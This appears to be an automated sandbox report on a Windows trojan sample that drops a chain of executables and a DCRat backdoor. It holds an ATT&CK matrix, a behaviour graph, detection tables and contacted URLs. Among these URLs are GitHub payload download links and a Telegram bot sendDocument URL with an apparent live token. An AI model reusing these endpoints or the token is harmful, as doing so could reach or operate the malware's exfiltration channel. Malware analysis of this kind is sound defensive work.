    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI66162\rarreg.key, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information111
    Scripting
    Valid Accounts331
    Windows Management Instrumentation
    111
    Scripting
    1
    DLL Side-Loading
    1
    File and Directory Permissions Modification
    1
    OS Credential Dumping
    2
    File and Directory Discovery
    Remote Services1
    Archive Collected Data
    1
    Web Service
    Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts31
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Bypass User Account Control
    51
    Disable or Modify Tools
    LSASS Memory25
    System Information Discovery
    Remote Desktop Protocol2
    Data from Local System
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts3
    PowerShell
    321
    Registry Run Keys / Startup Folder
    11
    Process Injection
    1
    Deobfuscate/Decode Files or Information
    Security Account Manager1
    Query Registry
    SMB/Windows Admin Shares1
    Clipboard Data
    1
    Encrypted Channel
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook321
    Registry Run Keys / Startup Folder
    1
    Obfuscated Files or Information
    NTDS23
    Security Software Discovery
    Distributed Component Object ModelInput Capture3
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
    Software Packing
    LSA Secrets2
    Process Discovery
    SSHKeylogging4
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Timestomp
    Cached Domain Credentials141
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSync1
    Application Window Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    Bypass User Account Control
    Proc Filesystem1
    Remote System Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt123
    Masquerading
    /etc/passwd and /etc/shadow1
    System Network Configuration Discovery
    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
    Modify Registry
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd141
    Virtualization/Sandbox Evasion
    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
    Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task11
    Process Injection
    KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1460520 Sample: QIjBj1l8We.exe Startdate: 21/06/2024 Architecture: WINDOWS Score: 100 109 api.telegram.org 2->109 111 206.23.85.13.in-addr.arpa 2->111 113 3 other IPs or domains 2->113 119 Snort IDS alert for network traffic 2->119 121 Antivirus detection for URL or domain 2->121 123 Antivirus detection for dropped file 2->123 127 17 other signatures 2->127 15 QIjBj1l8We.exe 9 2->15         started        signatures3 125 Uses the Telegram API (likely for C&C communication) 109->125 process4 file5 105 C:\Users\user\AppData\Local\Temp\x12.exe, PE32 15->105 dropped 18 x12.exe 9 15->18         started        21 Built.exe 15->21         started        process6 dnsIp7 85 C:\Users\user\AppData\Local\Temp\x11.exe, PE32 18->85 dropped 25 x11.exe 9 18->25         started        115 api.telegram.org 149.154.167.220, 443, 49747 TELEGRAMRU United Kingdom 21->115 117 ip-api.com 208.95.112.1, 49746, 80 TUT-ASUS United States 21->117 129 Very long command line found 21->129 131 Tries to harvest and steal browser information (history, passwords, etc) 21->131 133 Modifies Windows Defender protection settings 21->133 135 6 other signatures 21->135 28 cmd.exe 21->28         started        31 cmd.exe 21->31         started        33 cmd.exe 21->33         started        35 20 other processes 21->35 file8 signatures9 process10 file11 95 C:\Users\user\AppData\Local\Temp\x10.exe, PE32 25->95 dropped 37 x10.exe 9 25->37         started        143 Wscript starts Powershell (via cmd or directly) 28->143 145 Very long command line found 28->145 147 Uses cmd line tools excessively to alter registry or file data 28->147 157 3 other signatures 28->157 40 powershell.exe 28->40         started        43 conhost.exe 28->43         started        149 Encrypted powershell cmdline option found 31->149 45 powershell.exe 31->45         started        47 conhost.exe 31->47         started        151 Modifies Windows Defender protection settings 33->151 49 powershell.exe 33->49         started        51 conhost.exe 33->51         started        153 Adds a directory exclusion to Windows Defender 35->153 155 Tries to harvest and steal WLAN passwords 35->155 53 getmac.exe 35->53         started        55 39 other processes 35->55 signatures12 process13 file14 91 C:\Users\user\AppData\Local\Temp\x9.exe, PE32 37->91 dropped 57 x9.exe 9 37->57         started        137 Loading BitLocker PowerShell Module 40->137 93 C:\Users\user\AppData\...\gkfhm5n3.cmdline, Unicode 45->93 dropped 60 csc.exe 45->60         started        139 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 53->139 141 Writes or reads registry keys via WMI 53->141 62 Conhost.exe 55->62         started        64 Conhost.exe 55->64         started        66 Conhost.exe 55->66         started        signatures15 process16 file17 97 C:\Users\user\AppData\Local\Temp\x8.exe, PE32 57->97 dropped 68 x8.exe 9 57->68         started        99 C:\Users\user\AppData\Local\...\gkfhm5n3.dll, PE32 60->99 dropped 71 cvtres.exe 60->71         started        process18 file19 89 C:\Users\user\AppData\Local\Temp\x7.exe, PE32 68->89 dropped 73 x7.exe 9 68->73         started        process20 file21 101 C:\Users\user\AppData\Local\Temp\x6.exe, PE32 73->101 dropped 76 x6.exe 9 73->76         started        process22 file23 103 C:\Users\user\AppData\Local\Temp\x5.exe, PE32 76->103 dropped 79 x5.exe 9 76->79         started        process24 file25 107 C:\Users\user\AppData\Local\Temp\x4.exe, PE32 79->107 dropped 82 x4.exe 79->82         started        process26 file27 87 C:\Users\user\AppData\...\CheatLauncherV2.exe, PE32 82->87 dropped

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    QIjBj1l8We.exe86%VirustotalBrowse
    QIjBj1l8We.exe92%ReversingLabsWin32.Trojan.VBinder
    QIjBj1l8We.exe100%AviraTR/ATRAPS.Gen2
    QIjBj1l8We.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exe100%AviraHEUR/AGEN.1323984
    C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe100%AviraHEUR/AGEN.1323984
    C:\Recovery\fontdrvhost.exe100%AviraHEUR/AGEN.1323984
    C:\Users\user\AppData\Local\Temp\Built.exe100%AviraHEUR/AGEN.1306040
    C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe100%AviraHEUR/AGEN.1323984
    C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe100%AviraTR/ATRAPS.Gen2
    C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%AviraVBS/Runner.VPG
    C:\Program Files\Windows Mail\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323984
    C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exe100%Joe Sandbox ML
    C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe100%Joe Sandbox ML
    C:\Recovery\fontdrvhost.exe100%Joe Sandbox ML
    C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%Joe Sandbox ML
    C:\Program Files\Windows Mail\StartMenuExperienceHost.exe100%Joe Sandbox ML
    C:\Program Files\Adobe\Acrobat DC\Resource\Font\seCeUYjhGIFplo.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
    C:\Program Files\Windows Mail\StartMenuExperienceHost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
    C:\Recovery\fontdrvhost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
    C:\Recovery\seCeUYjhGIFplo.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
    C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\tasklist.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
    C:\Users\user\AppData\Local\Temp\Built.exe45%ReversingLabsWin64.Trojan.Generic
    C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe96%ReversingLabsWin32.Trojan.VBinder
    C:\Users\user\AppData\Local\Temp\DCRatBuild.exe71%ReversingLabsByteCode-MSIL.Trojan.Uztuby
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\.bin\mime0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\.bin\mime.ps10%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\mime\cli.js0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\mime\src\build.js0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Newtonsoft.Json.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\WebView2Loader.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\Wpf.Ui.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\cpr.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\libcurl.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\msvcp140.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\vcruntime140.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\ws2_32.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\Solara.Dir\zlib1.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe21%ReversingLabsWin32.PUA.Packunwan
    C:\Users\user\AppData\Local\Temp\_MEI66162\VCRUNTIME140.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_ctypes.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_queue.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_sqlite3.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\_ssl.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\libcrypto-3.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\libffi-8.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\libssl-3.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\python312.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\rar.exe0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\select.pyd0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\sqlite3.dll0%ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pyd0%ReversingLabs
    No Antivirus matches
    SourceDetectionScannerLabelLink
    github.com0%VirustotalBrowse
    raw.githubusercontent.com0%VirustotalBrowse
    ip-api.com0%VirustotalBrowse
    api.telegram.org2%VirustotalBrowse
    206.23.85.13.in-addr.arpa1%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://github.com/joyent/node/issues/17260%Avira URL Cloudsafe
    https://david-dm.org/inspect-js/has-proto0%Avira URL Cloudsafe
    https://david-dm.org/ljharb/es-errors.svg0%Avira URL Cloudsafe
    https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt0%Avira URL Cloudsafe
    https://github.com/ashtuchkin/iconv-lite/wiki/Supported-Encodings).0%Avira URL Cloudsafe
    https://img.shields.io/npm/l/es-errors.svg0%Avira URL Cloudsafe
    https://codecov.io/gh/ljharb/es-errors/branch/main/graphs/badge.svg0%Avira URL Cloudsafe
    https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt0%Avira URL Cloudsafe
    https://david-dm.org/inspect-js/has-proto0%VirustotalBrowse
    https://github.com/ashtuchkin/iconv-lite/wiki/Supported-Encodings).0%VirustotalBrowse
    https://github.com/danielgindi/node-autodetect-decoder-stream)0%Avira URL Cloudsafe
    https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txt0%VirustotalBrowse
    https://tidelift.com/security0%Avira URL Cloudsafe
    https://github.com/danielgindi/node-autodetect-decoder-stream)0%VirustotalBrowse
    https://codecov.io/gh/ljharb/es-errors/branch/main/graphs/badge.svg0%VirustotalBrowse
    https://img.shields.io/npm/l/es-errors.svg0%VirustotalBrowse
    https://david-dm.org/ljharb/es-errors.svg0%VirustotalBrowse
    https://github.com/ashtuchkin/iconv-lite/blob/master/lib/index.d.ts)0%VirustotalBrowse
    https://nodei.co/npm/has-proto.png?downloads=true&stars=true0%VirustotalBrowse
    https://tidelift.com/security0%VirustotalBrowse
    https://github.com/joyent/node/issues/17260%VirustotalBrowse
    https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt0%VirustotalBrowse
    https://nodei.co/npm/has-proto.png?downloads=true&stars=true0%Avira URL Cloudsafe
    https://github.com/ashtuchkin/iconv-lite/blob/master/lib/index.d.ts)0%Avira URL Cloudsafe
    https://github.com/ljharb)0%Avira URL Cloudsafe
    https://img.shields.io/npm/dm/es-errors.svg0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
    https://api.telegram.org/bot6463842780:AAFaYRMI8L5vU1x4kT-GXUhqbxhmWpQtN6k/sendDocument0%Avira URL Cloudsafe
    https://raw.githubusercontent.com/quivings/Solara/main/Storage/patched.txt0%Avira URL Cloudsafe
    http://c9.io).0%Avira URL Cloudsafe
    https://david-dm.org/inspect-js/has-proto#info=devDependencies0%Avira URL Cloudsafe
    https://curl.se/docs/hsts.html0%VirustotalBrowse
    https://github.com/bnoordhuis/node-iconv).0%Avira URL Cloudsafe
    https://codecov.io/gh/inspect-js/has-proto/branch/main/graphs/badge.svg0%Avira URL Cloudsafe
    https://img.shields.io/npm/dm/es-errors.svg0%VirustotalBrowse
    https://david-dm.org/inspect-js/has-proto#info=devDependencies0%VirustotalBrowse
    https://github.com/ljharb)0%VirustotalBrowse
    https://api.telegram.org/bot6463842780:AAFaYRMI8L5vU1x4kT-GXUhqbxhmWpQtN6k/sendDocument1%VirustotalBrowse
    https://david-dm.org/inspect-js/has-proto.svg0%Avira URL Cloudsafe
    https://david-dm.org/ljharb/es-errors#info=devDependencies0%Avira URL Cloudsafe
    http://yeoman.io/)0%Avira URL Cloudsafe
    https://codecov.io/gh/inspect-js/has-proto/branch/main/graphs/badge.svg0%VirustotalBrowse
    http://github.com/0%Avira URL Cloudsafe
    https://github.com/ljharb/es-errors/actions0%Avira URL Cloudsafe
    https://github.com/bnoordhuis/node-iconv).0%VirustotalBrowse
    https://david-dm.org/inspect-js/has-proto.svg0%VirustotalBrowse
    https://david-dm.org/ljharb/es-errors#info=devDependencies0%VirustotalBrowse
    http://gruntjs.com/)0%Avira URL Cloudsafe
    http://encoding.spec.whatwg.org/).0%Avira URL Cloudsafe
    https://david-dm.org/ljharb/es-errors0%Avira URL Cloudsafe
    https://github.com/ljharb/es-errors/actions0%VirustotalBrowse
    https://npm-stat.com/charts.html?package=es-errors0%Avira URL Cloudsafe
    https://raw.githubusercontent.com/quivings/Solara/main/Storage/patched.txt0%VirustotalBrowse
    http://gruntjs.com/)0%VirustotalBrowse
    https://david-dm.org/ljharb/es-errors0%VirustotalBrowse
    https://img.shields.io/npm/l/has-proto.svg0%Avira URL Cloudsafe
    https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md0%Avira URL Cloudsafe
    http://encoding.spec.whatwg.org/).0%VirustotalBrowse
    https://github.com/bnoordhuis/node-iconv)0%Avira URL Cloudsafe
    https://nodei.co/npm/es-errors.png?downloads=true&stars=true0%Avira URL Cloudsafe
    https://npm-stat.com/charts.html?package=es-errors0%VirustotalBrowse
    http://yeoman.io/)0%VirustotalBrowse
    https://img.shields.io/npm/l/has-proto.svg0%VirustotalBrowse
    http://github.com/0%VirustotalBrowse
    https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip0%Avira URL Cloudsafe
    https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md0%VirustotalBrowse
    https://npmjs.org/package/has-proto0%Avira URL Cloudsafe
    https://github.com/substack/node-browserify)0%Avira URL Cloudsafe
    https://nodei.co/npm/es-errors.png?downloads=true&stars=true0%VirustotalBrowse
    https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
    https://github.com/Microsoft/vscode/blob/master/LICENSE.txt0%Avira URL Cloudsafe
    https://github.com/bnoordhuis/node-iconv)0%VirustotalBrowse
    https://github.com/ashtuchkin/iconv-lite/wiki/Node-v4-compatibility).0%Avira URL Cloudsafe
    https://david-dm.org/ljharb/es-errors/dev-status.svg0%Avira URL Cloudsafe
    https://travis-ci.org/ashtuchkin/iconv-lite.svg?branch=master)0%Avira URL Cloudsafe
    https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip0%VirustotalBrowse
    http://www.nodemailer.com/)0%Avira URL Cloudsafe
    https://git.io/debug_fd)0%Avira URL Cloudsafe
    https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
    https://img.shields.io/npm/dm/has-proto.svg0%Avira URL Cloudsafe
    https://npmjs.org/packages/iconv-lite/)0%Avira URL Cloudsafe
    https://versionbadg.es/ljharb/es-errors.svg0%Avira URL Cloudsafe
    https://travis-ci.org/ashtuchkin/iconv-lite)0%Avira URL Cloudsafe
    https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
    https://versionbadg.es/inspect-js/has-proto.svg0%Avira URL Cloudsafe
    https://app.codecov.io/gh/inspect-js/has-proto/0%Avira URL Cloudsafe
    https://nodei.co/npm/iconv-lite.png?downloads=true&downloadRank=true)0%Avira URL Cloudsafe
    https://raw.githubusercontent.com/quivings/Solara/main/Files/Solara.Dir.zip100%Avira URL Cloudmalware
    https://app.codecov.io/gh/ljharb/es-errors/0%Avira URL Cloudsafe
    https://david-dm.org/inspect-js/has-proto/dev-status.svg0%Avira URL Cloudsafe
    https://npmjs.org/package/es-errors0%Avira URL Cloudsafe
    https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding).0%Avira URL Cloudsafe
    https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/inspect-js/h0%Avira URL Cloudsafe
    https://github.com/inspect-js/has-proto/actions0%Avira URL Cloudsafe
    https://npm-stat.com/charts.html?package=has-proto0%Avira URL Cloudsafe
    https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/ljharb/es-er0%Avira URL Cloudsafe
    http://ip-api.com/json/?fields=2255450%Avira URL Cloudsafe
    http://www.unicode.org/Public/MAPPINGS/)0%Avira URL Cloudsafe
    https://curl.se/V0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    github.com
    140.82.121.3
    truefalseunknown
    raw.githubusercontent.com
    185.199.109.133
    truefalseunknown
    ip-api.com
    208.95.112.1
    truefalseunknown
    api.telegram.org
    149.154.167.220
    truetrueunknown
    206.23.85.13.in-addr.arpa
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txtfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://api.telegram.org/bot6463842780:AAFaYRMI8L5vU1x4kT-GXUhqbxhmWpQtN6k/sendDocumentfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/quivings/Solara/main/Storage/patched.txtfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/quivings/Solara/main/Files/Solara.Dir.zipfalse
    • Avira URL Cloud: malware
    unknown
    http://ip-api.com/json/?fields=225545false
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://david-dm.org/inspect-js/has-protoREADME.md38.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/ashtuchkin/iconv-lite/wiki/Supported-Encodings).README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://david-dm.org/ljharb/es-errors.svgREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/joyent/node/issues/1726node.js0.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://img.shields.io/npm/l/es-errors.svgREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://codecov.io/gh/ljharb/es-errors/branch/main/graphs/badge.svgREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/microsoft/monaco-editor/blob/main/LICENSE.txtsql.js.14.dr, redshift.js.14.dr, pla.js.14.dr, freemarker2.js.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/danielgindi/node-autodetect-decoder-stream)README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://tidelift.com/securityREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://nodei.co/npm/has-proto.png?downloads=true&stars=trueREADME.md38.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/ashtuchkin/iconv-lite/blob/master/lib/index.d.ts)README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/ljharb)README.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://img.shields.io/npm/dm/es-errors.svgREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/hsts.htmllibcurl.dll.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://david-dm.org/inspect-js/has-proto#info=devDependenciesREADME.md38.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://c9.io).README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/bnoordhuis/node-iconv).README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://codecov.io/gh/inspect-js/has-proto/branch/main/graphs/badge.svgREADME.md38.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://david-dm.org/inspect-js/has-proto.svgREADME.md38.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://david-dm.org/ljharb/es-errors#info=devDependenciesREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://yeoman.io/)README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://github.com/README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/ljharb/es-errors/actionsREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://gruntjs.com/)README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://encoding.spec.whatwg.org/).README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://david-dm.org/ljharb/es-errorsREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://npm-stat.com/charts.html?package=es-errorsREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://img.shields.io/npm/l/has-proto.svgREADME.md38.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.mdmysql.js0.14.dr, cpp.js0.14.dr, vb.js0.14.dr, pgsql.js0.14.dr, r.js0.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/bnoordhuis/node-iconv)README.md48.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://nodei.co/npm/es-errors.png?downloads=true&stars=trueREADME.md16.14.drfalse
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://npmjs.org/package/has-protoREADME.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/substack/node-browserify)README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/http-cookies.htmllibcurl.dll.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/Microsoft/vscode/blob/master/LICENSE.txtloader.js.14.dr, editor.main.nls.zh-cn.js0.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://github.com/ashtuchkin/iconv-lite/wiki/Node-v4-compatibility).README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://david-dm.org/ljharb/es-errors/dev-status.svgREADME.md16.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://travis-ci.org/ashtuchkin/iconv-lite.svg?branch=master)README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    http://www.nodemailer.com/)README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://git.io/debug_fd)node.js0.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/alt-svc.htmllibcurl.dll.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://img.shields.io/npm/dm/has-proto.svgREADME.md38.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://npmjs.org/packages/iconv-lite/)README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://versionbadg.es/ljharb/es-errors.svgREADME.md16.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/copyright.htmlDlibcurl.dll.14.drfalse
    • Avira URL Cloud: safe
    unknown
    https://travis-ci.org/ashtuchkin/iconv-lite)README.md48.14.drfalse
    • Avira URL Cloud: safe
    unknown
